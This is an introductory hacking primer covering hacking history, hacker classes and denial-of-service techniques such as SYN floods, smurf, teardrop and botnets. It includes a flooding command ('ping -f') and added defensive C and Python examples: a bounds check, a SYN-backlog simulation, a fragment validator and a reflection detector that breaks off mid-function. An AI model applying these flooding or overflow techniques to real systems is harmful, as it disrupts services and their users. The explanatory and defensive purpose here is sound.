Hacking
Index
• Evolution of Hacking
• Introduction to Hacking
• Cyber Crime
• Special Attraction
• Viruses
• Hacking XP
• Glossary
• Prepared By
Evolution of Hacking

Astonishingly, hacking did not start as an anti-social activity. The entire story of hacking started with the belief that there is always more than one way to solve a problem. People also wanted to access information free of cost at any time.

Computer hacking started in the late 1950s. Before that, computers and programming languages were not easily accessible. Problems were solved by repeating known and successful computing methods. To work on computers, people needed formally stated problems and predesigned solutions. Computer time was allotted to professionals based on the priority of their requirements. The restricted use of computer resources reduced the chances for any experiments with early computers.

The authorities of the Massachusetts Institute of Technology (MIT) allowed people to access their TX-0 resources without any restrictions after official hours. That was the first time computer users got a chance to experiment with different methods for solving problems. In other words, that was the beginning of the hacker community. However, the prime aim of those hackers was to experiment with new solutions, without any malevolent intent. The early hackers performed their activities with a strong belief that there is always room for enhancement. They worked without any predefined structure or time schedule.

In parallel to computer hacking, a new type of hacker, the phreak, came into existence. Phreaks first accessed telephone networks by using handheld electronic devices. Phreaks used those devices to make modifications to pay telephones in order to make free telephone calls. To simulate coin payments in pay telephones, they used devices such as red boxes.

In the early 1980s, a new computing era started by connecting computers and telephone networks with the help of modems. Personal computers became popular. Users started to use modems and telephone networks to connect personal computers to mainframe computers. Access to the computers connected to the internet opened the entire world of computers to the hacker community. The rapid growth of internet technologies changed the profile of hackers.
Index
• What Is Hacking?
• How Do Hackers Hack?
• Classes Of Hackers
• How To Become A Hacker?
• Common Hacking Techniques
• Passwords
• Sniffers: Basics and Detection
What is Hacking?
Hacking is the act of penetrating computer systems to gain knowledge about the system and how it works.

What are Hackers?
Technically, a hacker is someone who is enthusiastic about computer programming and all things relating to the technical workings of a computer. Such a definition presents the term in a more positive light than is usually associated with it. Most people understand a hacker to be what is more accurately known as a 'cracker'.

What are Crackers?
Crackers are people who try to gain unauthorized access to computers. This is often done through the use of a 'backdoor' program installed on your machine. A lot of crackers also try to gain access to resources through the use of password cracking software, which tries millions or billions of candidate passwords to find the correct one for accessing a computer.

What damage can a Hacker do?
This depends upon what backdoor program(s) are hiding on your PC. Different programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker can't do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing, and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that could be done to a file. A hacker could install several programs on your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card details.
How do Hackers hack?
There are many ways in which a hacker can hack. Some are as follows:
• NetBIOS
• ICMP Ping
• FTP
• rpc.statd
• HTTP

NetBIOS
NetBIOS hacks are the worst kind, since they don't require you to have any hidden backdoor program running on your computer. This kind of hack exploits a weakness in Windows 9x. NetBIOS is meant to be used on local area networks, so machines on that network can share files and printers. Unfortunately, NetBIOS over TCP/IP (ports 137-139) is also reachable across the Internet, so a Windows 9x machine with file sharing enabled and no firewall exposes its shares to anyone, and a hacker can access your machine remotely.

ICMP 'Ping' (Internet Control Message Protocol)
ICMP is one of the main protocols that make the Internet work. It stands for Internet Control Message Protocol. 'Ping' (an ICMP Echo Request) is one of the messages that can be sent to a computer using ICMP. Ordinarily, a computer would respond to this ping with an Echo Reply, telling the sender that the computer exists. This is all pings are meant to do. Pings may seem harmless enough, but a large number of pings can make a Denial-of-Service attack, which overloads a computer. Also, hackers use pings to see if a computer exists and does not have a firewall (firewalls can block pings). If a computer responds to a ping, the hacker could then launch a more serious attack against it.

FTP (File Transfer Protocol)
FTP is a standard Internet protocol, standing for File Transfer Protocol. You may use it for file downloads from some websites. If you have a web page of your own, you may use FTP to upload it from your home computer to the web server. However, FTP can also be used by some hackers. FTP normally requires some form of authentication for access to private files, or for writing to files. FTP backdoor programs, such as
• Doly Trojan
• Fore
• Blade Runner
simply turn your computer into an FTP server, without any authentication.

rpc.statd
This is a problem specific to Linux and Unix. The problem is the infamous unchecked buffer overflow. A fixed amount of memory is set aside for storage of data. If data is received that is larger than this buffer, the program should truncate the data or send back an error, or at least do something other than ignore the problem. Unfortunately, in an unchecked copy the data overflows the memory that has been allocated to it, and is written into parts of memory it shouldn't be in. This can cause crashes of various kinds. However, a skilled hacker can place program code into that memory and arrange for it to be executed, running whatever the hacker wants with the privileges of the vulnerable program.
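The unchecked copy described above, shown beside its checked form, as an added example written for this page. It is not the actual rpc.statd code and not taken from the original document; the 32-byte buffer, the handler names and the inputs are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define NAME_MAX 32   /* fixed-size buffer set aside for the incoming name (assumed size) */

/* Unchecked pattern: the length that arrives on the wire is trusted and copied
 * into a 32-byte stack buffer with no comparison against its size. It is only
 * ever called below with short input; with len >= NAME_MAX it writes past the
 * end of 'name', which is exactly the overflow the text describes. */
int handle_unchecked(const char *data, size_t len)
{
    char name[NAME_MAX];
    memcpy(name, data, len);      /* no bounds check */
    name[len] = '\0';             /* also out of bounds when len == NAME_MAX */
    return (int)strlen(name);
}

/* Checked version: reject any input that does not fit together with its
 * terminating NUL. Note the comparison is '>=', not '>': a 32-byte name in a
 * 32-byte buffer leaves no room for the terminator, the classic off-by-one. */
int handle_checked(const char *data, size_t len)
{
    char name[NAME_MAX];
    if (len >= sizeof name)
        return -1;                /* error back to the sender instead of overflowing */
    memcpy(name, data, len);
    name[len] = '\0';
    return (int)strlen(name);
}

int main(void)
{
    /* Constructed inputs: a short name and one that is exactly one byte too long. */
    const char *ok = "alice";
    const char *long_name = "0123456789abcdef0123456789abcdef";   /* 32 bytes */

    printf("checked(\"alice\")   = %d\n", handle_checked(ok, strlen(ok)));
    printf("checked(32 bytes)   = %d\n", handle_checked(long_name, strlen(long_name)));
    printf("unchecked(\"alice\") = %d\n", handle_unchecked(ok, strlen(ok)));
    /* handle_unchecked(long_name, 32) is deliberately not called: it would overflow. */
    return 0;
}
```

The check has to happen before the copy and has to count the terminator; a handler that compares with `>` instead of `>=` still writes one byte past the buffer on a name of exactly 32 bytes.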
HTTP
HTTP stands for HyperText Transfer Protocol. Web servers of any kind can have such bugs; the example here concerns Microsoft web server software such as Personal Web Server. There was a bug in this software of the 'unchecked buffer overflow' kind. If a user makes a request for a file on the web server with a very long name, part of the request gets written into parts of memory that contain active program code. A malicious user could use this to run any program they want on the server.
Classes of Hackers
Today, it is very difficult to distinguish between hackers, crackers, and script kiddies. Therefore, hackers have been categorized into different groups based on the nature of their activities:
• White hats
• Black hats
• Gray hats

White Hats
White hat hackers use their skills and knowledge for good purposes. These hackers help to find new security vulnerabilities and their solutions. White hats do not hack systems with any bad intent. They like experimenting and believe that there is always a better solution than the current one. White hat hackers always report the vulnerabilities they discover to the concerned security professionals. For example, a hacker who finds a weakness in a system and helps the system administrator implement better security measures is a white hat hacker.

Black Hats
Black hat hackers perform their activities with bad intentions. Black hats perform illegal activities, such as destroying data, denying services to legitimate users, and defacing Web sites. For example, a hacker who breaks into the network of a bank and steals thousands of dollars by transferring it to other banks is a black hat. Black hat hackers share their findings with other crackers but not with the concerned security professionals.

Gray Hats
Gray hat hackers are those people who do not believe in categorizing hacking activities as good or bad. Gray hats believe that some of the activities which are condemned by white hats are harmless. Gray hat hackers might share the results of their experiments with both security professionals and crackers.
The Hacker Attitude
Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude. But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. They're also important because becoming the kind of person who believes these things is important, for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters -- not just intellectually but emotionally as well. (lots of these on alt.2600.hgackerz) So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.
Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval. (so I would take it all hackers are wankers lol) You also have to develop a kind of faith in your own learning capacity -- a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece -- and so on, until you're done. (I agree)

2. Nobody should ever have to solve a problem twice.
Creative brains are a valuable, limited resource. They shouldn't be wasted on reinventing the wheel when there are so many fascinating new problems waiting out there. To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones. (You don't have to believe that you're obligated to give all your creative product away, though the hackers that do that get the most respect from other hackers. It's definitely OK to sell enough of it to keep you in food and rent and computers. It's OK to use your hacking skills to support a family or even get rich, as long as you don't forget you're a hacker while you're doing it.)

3. Boredom and drudgery are evil.
Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do -- solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil. To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers). (There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice -- nobody who can think should ever be forced into boredom.)

4. Freedom is good.
Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by -- and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers. (This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.) Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing -- they only like cooperation that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.

5. Attitude is no substitute for competence.
To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work. Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence -- especially competence at hacking, but competence at anything is good. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best. If you revere competence, you'll enjoy developing it in yourself -- the hard work and dedication will become a kind of intense play rather than drudgery. And that's vital to becoming a hacker.
How To Become A Hacker
Looking for advice on learning to crack passwords, sabotage systems, mangle websites, write viruses, and plant Trojan horses? You came to the wrong place. Looking for advice on how to learn the guts and bowels of a system or network, get inside it, and become a real expert? Maybe I can help there. How you use this knowledge is up to you. I hope you'll use it to contribute to computer science and hacking (in its good sense), not to become a cracker or vandal. This little essay is basically the answers to all the emails I get asking how to become a hacker. It's not a tutorial in and of itself. It's certainly not a guaranteed success. Just give it a try and see what happens. That said, here's where to start:

Be curious
Take things apart. Look under the hood. Dig through your system directories and see what's in there. View the files with hex editors. Look inside your computer. Wander around computer stores and look at what's there.

Read everything in sight
If you can afford it, buy lots of books. If you can't, spend time in libraries and online. Borrow books from friends. Go through tutorials. Read the help files on your system. If you're using Unix/Linux, read the man files. Check out the local college bookstores and libraries. And as you're reading, try things (see next paragraph).

Experiment
Don't be afraid to change things, just to see what'll happen. Do this long enough, of course, and you'll wipe out your system (see next paragraph), but that's part of becoming a hacker. Try command options and switches you've never tried before. Look for option menus on programs and see what they can do. In Windows, tweak your registry and see what happens. Change settings in .INI files. In Unix, dig around in the directories where you don't normally go. On the Macintosh, play around in the system folder.

Make backups
If you start mucking around with system files, registries, password files, and such, you will eventually destroy your system. Have a backup ready. If you can afford it, have a system you use just for experimenting, ready to reload on a moment's notice, and do your serious work (or serious gaming!) on a different computer.

Don't limit yourself
Who says a computer or network is the only place to hack? Take apart your telephone. Figure out your television (careful of the high voltage around the picture tube - if you fry yourself, it's not my fault) and VCR. Figure out how closed captioning works (that was a plug for my CaptionCentral.com Web site). Take apart your printer. Pick up the latest issues of Nuts & Volts and Midnight Engineer (you've obviously made a good start if you're reading Blacklisted! 411). Take apart the locks on your doors. Figure out how your radio works. Be insatiably curious and read voraciously. There are groups you can learn from. There are whole Web sites devoted to hacking TiVo units, for example.

Get some real tools
You can't cut a board in half with a screwdriver. Well, maybe you can, but it'll take a long time. Dig around and find the proper tools for the operating systems you're using. They're out there on the Web. You can get some pretty good stuff as shareware or freeware (especially on Linux). The serious power tools often cost serious money. What kinds of tools? Hex file editors. Snoopers that analyze system messages and network traffic. Compilers and APIs for programming. Scripting tools. Disk editors/formatters. Disassemblers. When you get good, write some of your own.

Learn to program
If you want to be a hacker, you're going to have to learn to program. The easiest way to start depends on the operating system you're using. The choice of language is very individual. It's almost a religious thing. Suggest a programming language to a beginner, and someone will disagree. Heck, you'll probably get flamed for it in a newsgroup. In Unix, I'd suggest getting started with Perl. Buy a copy of the camel book (Programming Perl) and the llama book (Learning Perl). You'll have the fundamentals of programming really fast! The best part is that the language itself is free. In Windows, you can get started quickly using a visual development environment like Visual Basic or Java. No matter what the system, if you want to get serious, you'll eventually need to learn C (or C++ or C# or some other variant). Real hackers know more than one programming language, anyway, because no one language is right for every task.

Learn to type
Hackers spend a lot of time at their keyboards. I type 90+ wpm (according to the Mavis Beacon typing tutor). HackingWiz (of hackers.com and Hacker's Haven BBS fame) says he can type 140+ wpm. The typing tutor may be boring, but it pays off.

Use real operating systems
Windows 95/98/Me is a shell on top of a 32-bit patch to a 16-bit DOS. Get some real operating systems (Linux, Windows NT, Mac OS, OS/2...) and learn them. You can't call yourself a linguist if you only know one language, and you certainly can't call yourself a hacker if you only know one OS. Linux is a hacker's dream. All the source code is freely available. Play with it, analyze it, learn it. Eventually, perhaps you can make a contribution to Linux yourself. Who knows, you might even have a chance to write your own OS.

Talk to people
It's hard to learn in a vacuum. Take classes. Join users groups or computer clubs. Talk to people on IRC or newsgroups or Web boards until you find people to learn with. That can take a while. Every third message on newsgroups like alt.hack* is "teach me to hack." Sigh. The best way to be accepted in any group is to contribute something. Share what you learn, and others will share with you.

Do some projects
It's important to pick some projects and work until you've finished them. Learning comes from doing, and you must follow the project through start to finish to really understand it. Start really simple. Make an icon. Customize your system (the startup screen on Win95, or the prompt on Unix). Make a script that performs some common operation. Write a program that manipulates a file (try encrypting something).

Learn to really use the Internet
Start with the Web. Read the help for the search engines. Learn how to use Boolean searches. Build up an awesome set of bookmarks. Then move on to other Internet resources. Get on Usenet. Find some underground BBSs. Get on IRC. You'll find useful information in the strangest places. Get to the point where you can answer your own questions. It's a whole lot faster than plastering them all over various newsgroups and waiting for a serious answer. Once you've gone through these steps, go out and contribute something. The Internet was built by hackers. Linux was built by hackers. Usenet was built by hackers. Sendmail was built by hackers. Be one of the hackers that builds something.
Common Hacking Techniques
The various hacking techniques include:
• Denial-of-service
• Trojan Horses
• Spoofing
• Sniffing
• Password Cracking

Denial-of-Service attacks

Methods of attack
A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. Examples include:
• Attempts to "flood" a network, thereby preventing legitimate network traffic;
• Attempts to disrupt a server by sending more requests than it can possibly handle, thereby preventing access to a service;
• Attempts to prevent a particular individual from accessing a service;
• Attempts to disrupt service to a specific system or person.
Attacks can be directed at any network device, including attacks on routing devices and Web, electronic mail, or Domain Name System servers. A DoS attack can be perpetrated in a number of ways. There are three basic types of attack:
1. Consumption of computational resources, such as bandwidth, disk space, or CPU time;
2. Disruption of configuration information, such as routing information;
3. Disruption of physical network components.
In addition, the US-CERT has provided tips on the manifestations of DoS attacks:
• Unusually slow network performance (opening files or accessing web sites)
• Unavailability of a particular web site
• Inability to access any web site
• Dramatic increase in the number of spam emails received
SYN floods
A SYN flood sends a flood of TCP SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to create a half-open connection by sending back a TCP SYN-ACK packet and waiting for a TCP ACK packet in response from the sender address. However, because the sender address is forged, the response never comes. These half-open connections consume resources on the server and limit the number of connections the server is able to make, reducing the server's ability to respond to legitimate requests until the attack ends.

When a computer wants to make a TCP/IP connection (the most common internet connection) to another computer, usually a server, an exchange of TCP SYN and ACK packets occurs. The computer requesting the connection, usually the client's or user's computer, sends a TCP SYN packet which asks the server if it can connect. If the server will allow connections, it sends a TCP SYN-ACK packet back to the client to say "Yes, you may connect" and reserves a space for the connection, waiting for the client to respond with a TCP ACK packet that completes the handshake. In a SYN flood the address of the client is forged, so that when the server sends the go-ahead back to the client, the message is never received because the client either doesn't exist or wasn't expecting the packet and ignores it. This leaves the server with a dead connection, reserved for a client that will never respond. Usually this is done to one server many times in order to reserve all the connections for unresolved clients, which keeps legitimate clients from making connections.

The classic example is that of a party. Only 50 people can be invited to a party, and invitations are available on a first-come first-served basis. Fifty letters are sent to request invitations, but the letters all have false return addresses. The invitations are mailed to the return addresses of the request letters. Unfortunately, all of the return addresses provided were fake, so nobody, or at least nobody of interest, receives the invitations. Now, when someone actually wants to come to the party (view the website), there are no invitations left because all the invitations (connections) have been reserved for 50 supposed people who will never actually show up.
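The party analogy above as an added simulation of the server's half-open connection table. This is example code written for this page, not taken from it or from any real TCP stack; the backlog size of 50, the 3-second SYN-ACK timeout and the addresses are assumptions chosen to match the analogy.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BACKLOG 50          /* half-open connections the listener will hold (assumed) */
#define SYN_TIMEOUT 3       /* seconds before an unanswered SYN-ACK is given up (assumed) */

struct half_open {
    uint32_t src;           /* claimed source address of the SYN */
    int active;
    int created;            /* time the SYN-ACK was sent */
};

struct listener {
    struct half_open table[BACKLOG];
    int accepted;           /* SYNs that got a slot */
    int dropped;            /* SYNs refused because the table was full */
};

void listener_init(struct listener *l) { memset(l, 0, sizeof *l); }

/* Free slots whose SYN-ACK has gone unanswered for SYN_TIMEOUT seconds. */
void listener_expire(struct listener *l, int now)
{
    for (int i = 0; i < BACKLOG; i++)
        if (l->table[i].active && now - l->table[i].created >= SYN_TIMEOUT)
            l->table[i].active = 0;
}

/* Handle a SYN: reserve a slot and "send" SYN-ACK. Returns 1 if a slot was
 * reserved, 0 if the backlog is full and the SYN had to be dropped. */
int listener_syn(struct listener *l, uint32_t src, int now)
{
    listener_expire(l, now);
    for (int i = 0; i < BACKLOG; i++) {
        if (!l->table[i].active) {
            l->table[i].src = src;
            l->table[i].active = 1;
            l->table[i].created = now;
            l->accepted++;
            return 1;
        }
    }
    l->dropped++;
    return 0;
}

/* Handle the final ACK of the handshake: the half-open slot is released (a
 * real stack would move the connection to its established table). Returns 1
 * if a matching half-open entry existed, 0 for an ACK nobody was waiting for. */
int listener_ack(struct listener *l, uint32_t src)
{
    for (int i = 0; i < BACKLOG; i++) {
        if (l->table[i].active && l->table[i].src == src) {
            l->table[i].active = 0;
            return 1;
        }
    }
    return 0;
}

/* The scenario from the text: the attacker sends BACKLOG SYNs with forged
 * sources that never ACK, then a legitimate client tries to connect
 * legit_delay seconds later. Returns 1 if the legitimate client got a slot. */
int syn_flood_scenario(int legit_delay)
{
    struct listener l;
    listener_init(&l);
    for (uint32_t i = 0; i < BACKLOG; i++)
        listener_syn(&l, 0x0A000000u + i, 0);          /* 10.0.0.x, forged, constructed */
    int got_in = listener_syn(&l, 0xC0A80101u, legit_delay);   /* 192.168.1.1 */
    if (got_in)
        listener_ack(&l, 0xC0A80101u);                 /* real client completes the handshake */
    return got_in;
}

int main(void)
{
    printf("legit client right after the flood: %s\n",
           syn_flood_scenario(0) ? "connected" : "dropped");
    printf("legit client after %d s:             %s\n", SYN_TIMEOUT,
           syn_flood_scenario(SYN_TIMEOUT) ? "connected" : "dropped");
    return 0;
}
```

Expiry alone only buys time, because a real attacker keeps sending forged SYNs faster than the entries time out. That is why stacks fall back to SYN cookies under load: the half-open state is encoded in the SYN-ACK sequence number and no table entry is kept at all, so there is nothing for the forged SYNs to exhaust.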
LAND attack
A LAND attack involves sending a spoofed TCP SYN packet (connection initiation) with the target host's IP address and an open port as both source and destination. The attack causes the targeted machine to reply to itself continuously and eventually crash.

ICMP floods
A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on mis-configured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The network then serves as a smurf amplifier. In such an attack, the perpetrators will send large numbers of IP packets with the source address faked to appear to be the address of the victim. To combat Denial of Service attacks on the Internet, services like the Smurf Amplifier Registry have given network service providers the ability to identify misconfigured networks and to take appropriate action such as filtering.

Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the "ping -f" command. It is very simple to launch, the primary requirement being access to greater bandwidth than the victim.

UDP floods
UDP floods include "Fraggle attacks". In a fraggle attack an attacker sends a large amount of UDP echo traffic to IP broadcast addresses, all of it having a fake source address. It is a simple rewrite of the smurf attack code.
Teardrop attack
The Teardrop attack involves sending IP fragments with overlapping, oversized payloads to the target machine. A bug in the TCP/IP fragmentation re-assembly code caused the fragments to be improperly handled, crashing the operating system as a result. Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to 2.0.32 and 2.1.63, are vulnerable to this attack.

Application level floods
On IRC, IRC floods are a common electronic warfare weapon. Various DoS-causing exploits such as buffer overflow can cause server-running software to get confused and fill the disk space or consume all available memory or CPU time.
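The fragment check a reassembler needs in order not to be caught by the Teardrop pattern described above (overlapping or oversized fragments), as an added example written for this page. It is not the code of any real operating system's reassembly path; the fragment sets, the byte-offset representation and the verdict names are constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>

#define IP_MAX_DATAGRAM 65535u   /* largest reassembled IP datagram */

/* One fragment as seen by the reassembler. Offsets are in bytes here; the
 * IP header carries them in 8-byte units, so a real implementation
 * multiplies the header field by 8 first. */
struct frag {
    unsigned offset;
    unsigned len;
};

enum frag_verdict { FRAG_OK = 0, FRAG_OVERLAP = 1, FRAG_OVERSIZE = 2 };

/* Sort fragments by offset (insertion sort; n is small per datagram). */
static void sort_by_offset(struct frag *f, size_t n)
{
    for (size_t i = 1; i < n; i++) {
        struct frag key = f[i];
        size_t j = i;
        while (j > 0 && f[j - 1].offset > key.offset) {
            f[j] = f[j - 1];
            j--;
        }
        f[j] = key;
    }
}

/* Validate a fragment set before reassembly. A Teardrop-style set has a
 * later fragment whose start lies inside an earlier one; an oversized set
 * would reassemble past 65535 bytes. Either is rejected before any copy
 * into the reassembly buffer takes place. */
enum frag_verdict check_fragments(struct frag *f, size_t n)
{
    sort_by_offset(f, n);
    unsigned end = 0;                      /* byte just past the data seen so far */
    for (size_t i = 0; i < n; i++) {
        if (f[i].offset < end)             /* starts before the previous one finished */
            return FRAG_OVERLAP;
        if (f[i].len > IP_MAX_DATAGRAM - f[i].offset)  /* same test as offset+len > max, without wrapping */
            return FRAG_OVERSIZE;
        end = f[i].offset + f[i].len;
    }
    return FRAG_OK;
}

/* Constructed fragment sets used as inputs. */
int teardrop_example(void)
{
    /* Second fragment claims to start at byte 24, inside the first one's 0..36. */
    struct frag f[] = { { 0, 36 }, { 24, 4 } };
    return check_fragments(f, 2);
}

int benign_example(void)
{
    /* Three back-to-back 1480-byte fragments, as a 1500-byte MTU path produces, arriving out of order. */
    struct frag f[] = { { 2960, 1480 }, { 0, 1480 }, { 1480, 1480 } };
    return check_fragments(f, 3);
}

int oversize_example(void)
{
    /* Offset plus length would exceed the 65535-byte datagram limit. */
    struct frag f[] = { { 0, 1480 }, { 65000, 1000 } };
    return check_fragments(f, 2);
}

int main(void)
{
    printf("teardrop set: %d (1 = overlap)\n", teardrop_example());
    printf("benign set:   %d (0 = ok)\n", benign_example());
    printf("oversize set: %d (2 = oversize)\n", oversize_example());
    return 0;
}
```

Rejecting any overlap is the strict choice; stacks that instead trim overlapping fragments must do the trimming with the same care, since a trimmed length that goes negative is exactly the arithmetic the original Teardrop bug got wrong.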
Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker having higher bandwidth available than the victim; a common way of achieving this today is via Distributed Denial of Service, employing a botnet. Other floods may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs.

A "banana attack" is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets.

An attacker with access to a victim's computer may slow it until it is unusable or crash it by using a fork bomb.

A 'pulsing zombie' is a term referring to a special denial-of-service attack. A network is subjected to hostile pinging by different attacker computers over an extended amount of time. This results in a degraded quality of service and increased workload for the network's resources. This type of attack is more difficult to detect than traditional denial-of-service attacks due to its surreptitious nature.

Nukes
Nukes are malformed or specially crafted packets. WinNuke is a type of nuke, exploiting a vulnerability in the NetBIOS handler in Windows 95. A string of out-of-band data is sent to TCP port 139 of the victim machine, causing it to lock up and display a Blue Screen of Death. This attack was very popular among IRC-dwelling script kiddies, due to the easy availability of a user-friendly click-and-crash WinNuke program.

Distributed attack
A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods. Malware can carry DDoS attack mechanisms; one of the more well known examples of this was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address prior to release of the malware and no further interaction was necessary to launch the attack.

A system may also be compromised with a trojan, allowing the attacker to download a zombie agent (or the trojan may contain one). Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web.

Stacheldraht is a classic example of a DDoS tool. It utilizes a layered structure where the attacker uses a client program to connect to handlers, which are compromised systems that issue commands to the zombie agents, which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker, using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents.

These collections of compromised systems are known as botnets. DDoS tools like Stacheldraht still use classic DoS attack methods centered around IP spoofing and amplification like smurf and fraggle attacks (these are also known as bandwidth consumption attacks). SYN floods (also known as resource starvation attacks) may also be used. Newer tools can use DNS servers for DoS purposes (see next section).

Unlike MyDoom's DDoS mechanism, botnets can be turned against any IP address. Script kiddies use them to deny the availability of well known websites to legitimate users. More sophisticated attackers use DDoS tools for the purposes of extortion -- even against their business rivals.

It is important to note the difference between a DDoS and a DoS attack. If an attacker mounts a smurf attack from a single host it would be classed as a DoS attack. In fact, any attack against availability (e.g. using high-energy radio-frequency weapons to render computer equipment inoperable) would be classed as a Denial of Service attack, albeit an exotic one. On the other hand, if an attacker uses a thousand zombie systems to simultaneously launch smurf attacks against a remote host, this would be classed as a DDoS attack.
Reflected attack
A distributed reflected denial of service attack involves sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet protocol spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target. ICMP Echo Request attacks (described above) can be considered one form of reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of misconfigured networks, thereby enticing a large number of hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack. Many services can be exploited to act as reflectors, some harder to block than others. DNS amplification attacks involve a newer mechanism that increases the amplification effect, using a much larger list of DNS servers than seen earlier.
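An added example, not from the original text: detection logic that flags the signature of a reflected attack, replies (DNS, NTP, ICMP echo) arriving at a host that never sent the matching requests, from many distinct sources. The flow records are constructed; a real deployment would feed NetFlow or capture summaries into the same function.

```python
# Unsolicited-reply detector for reflected / amplified DoS traffic (constructed example).
from collections import defaultdict

REFLECTOR_PORTS = {53: "dns", 123: "ntp"}   # reply services the text discusses (DNS, NTP)

# Flow record fields: (proto, src_ip, src_port, dst_ip, dst_port, nbytes)
# proto is "udp", "icmp-req" (echo request) or "icmp-rep" (echo reply).


def find_reflection_victims(flows, min_reflectors=20, min_bytes=50_000):
    """Return {victim_ip: {service: {"reflectors": n, "bytes": b, "avg_reply_bytes": a}}}
    for hosts that receive replies to requests they never sent, from at least
    min_reflectors distinct sources and totalling at least min_bytes."""
    sent = set()                            # (requester, responder, service) pairs actually seen
    for proto, src, sport, dst, dport, nbytes in flows:
        if proto == "udp" and dport in REFLECTOR_PORTS:
            sent.add((src, dst, REFLECTOR_PORTS[dport]))
        elif proto == "icmp-req":
            sent.add((src, dst, "icmp"))

    unsolicited = defaultdict(lambda: defaultdict(lambda: {"sources": set(), "bytes": 0, "count": 0}))
    for proto, src, sport, dst, dport, nbytes in flows:
        if proto == "udp" and sport in REFLECTOR_PORTS:
            service = REFLECTOR_PORTS[sport]
        elif proto == "icmp-rep":
            service = "icmp"
        else:
            continue
        if (dst, src, service) in sent:
            continue                        # a reply the destination really asked for
        entry = unsolicited[dst][service]
        entry["sources"].add(src)
        entry["bytes"] += nbytes
        entry["count"] += 1

    victims = {}
    for dst, per_service in unsolicited.items():
        for service, entry in per_service.items():
            if len(entry["sources"]) >= min_reflectors and entry["bytes"] >= min_bytes:
                victims.setdefault(dst, {})[service] = {
                    "reflectors": len(entry["sources"]),
                    "bytes": entry["bytes"],
                    "avg_reply_bytes": entry["bytes"] // entry["count"],
                }
    return victims


def constructed_flows():
    """Synthetic records: one victim hit by 80 open resolvers answering queries
    forged in its name and by 40 hosts on a misconfigured broadcast network,
    plus one host doing an ordinary DNS lookup that must not be flagged."""
    flows = []
    victim = "192.0.2.10"
    for i in range(80):
        flows.append(("udp", f"203.0.113.{i + 1}", 53, victim, 3030, 3000))
    for i in range(40):
        flows.append(("icmp-rep", f"198.51.100.{i + 1}", 0, victim, 0, 1500))
    flows.append(("udp", "192.0.2.20", 50123, "203.0.113.200", 53, 60))    # genuine query
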